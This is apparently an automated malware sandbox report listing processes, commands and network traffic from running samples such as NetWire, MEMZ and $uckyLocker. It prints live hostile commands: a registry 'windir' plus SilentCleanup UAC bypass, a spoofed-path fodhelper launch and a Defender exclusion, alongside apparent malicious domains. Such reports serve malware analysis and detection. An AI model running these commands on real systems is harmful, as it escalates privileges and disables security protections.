PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=4852 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5704 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5864 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5532 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5224 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=4100 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=6120 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --mojo-platform-channel-handle=6188 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=6696 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4476 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\Downloads\$uckyLocker.exe

"C:\Users\Admin\Downloads\$uckyLocker.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --mojo-platform-channel-handle=6552 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=6692 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5500 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\Downloads\NetWire.exe

"C:\Users\Admin\Downloads\NetWire.exe"

C:\Users\Admin\Downloads\NetWire.exe

"C:\Users\Admin\Downloads\NetWire.exe"

C:\Users\Admin\Downloads\NetWire.exe

"C:\Users\Admin\Downloads\NetWire.exe"

C:\Users\Admin\Downloads\NetWire.exe

"C:\Users\Admin\Downloads\NetWire.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4b4 0x33c

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --mojo-platform-channel-handle=6208 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --mojo-platform-channel-handle=6172 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=6984 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Windows\SysWOW64\Notepad.exe

C:\Windows\System32\Notepad.exe

C:\Windows\SysWOW64\Notepad.exe

C:\Windows\System32\Notepad.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "

C:\Program Files (x86)\internet explorer\ieinstal.exe

"C:\Program Files (x86)\internet explorer\ieinstal.exe"

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Program Files (x86)\internet explorer\ieinstal.exe

"C:\Program Files (x86)\internet explorer\ieinstal.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4928 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\Downloads\AdwereCleaner.exe

"C:\Users\Admin\Downloads\AdwereCleaner.exe"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Users\Admin\Downloads\AdwereCleaner.exe

"C:\Users\Admin\Downloads\AdwereCleaner.exe"

C:\Users\Admin\Downloads\AdwereCleaner.exe

"C:\Users\Admin\Downloads\AdwereCleaner.exe"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Runex.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2588 -ip 2588

C:\Windows \System32\fodhelper.exe

"C:\Windows \System32\fodhelper.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Public\x.vbs

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 428

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Public\x.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cde.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2588 -ip 2588

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --mojo-platform-channel-handle=6864 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=7212 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=7228 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\Downloads\SpySheriff.exe

"C:\Users\Admin\Downloads\SpySheriff.exe"

C:\Users\Admin\Downloads\SpySheriff.exe

"C:\Users\Admin\Downloads\SpySheriff.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --mojo-platform-channel-handle=7304 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=7452 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=1032 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe"

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /main

C:\Windows\SysWOW64\notepad.exe

"C:\Windows\System32\notepad.exe" \note.txt

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=virus+builder+legit+free+download

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --mojo-platform-channel-handle=7056 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --mojo-platform-channel-handle=5252 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=mcafee+vs+norton

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --mojo-platform-channel-handle=6120 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --mojo-platform-channel-handle=7296 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=6748 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --mojo-platform-channel-handle=6464 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=7644 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=7656 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe"

C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe

"C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe"

C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe

"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=dank+memz

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --mojo-platform-channel-handle=7560 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --mojo-platform-channel-handle=6984 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 20.26.156.215:443 github.com tcp
GB 13.87.96.169:443 nav-edge.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
GB 104.91.71.140:443 bzib.nelreports.net tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
NL 72.246.173.187:443 www.microsoft.com tcp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 169.96.87.13.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 187.173.246.72.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.112.22:443 collector.github.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 140.82.112.22:443 collector.github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
US 185.199.108.154:443 github.githubassets.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 22.112.82.140.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 94.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
NL 23.62.61.194:443 www.bing.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 telem-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 telem-edge.smartscreen.microsoft.com udp
GB 51.140.244.186:443 telem-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 186.244.140.51.in-addr.arpa udp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
GB 20.162.145.158:443 app-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 158.145.162.20.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.210:443 api.github.com tcp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 telem-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 telem-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
GB 20.162.145.158:443 app-edge.smartscreen.microsoft.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.179.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.38.233:80 crl.usertrust.com tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 crl.comodoca.com udp
US 104.18.38.233:80 crl.comodoca.com tcp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
GB 20.162.145.158:443 app-edge.smartscreen.microsoft.com tcp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 193.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 tamerimia.ug udp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
US 172.64.149.23:80 crl.comodoca.com tcp
US 104.18.38.233:80 crl.comodoca.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
GB 20.162.145.158:443 app-edge.smartscreen.microsoft.com tcp
NL 23.62.61.155:443 www.bing.com tcp
GB 20.26.156.210:443 api.github.com tcp
CA 69.50.175.178:80 tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 vbchjfssdfcxbcver.ru udp
US 8.8.8.8:53 collector.github.com udp
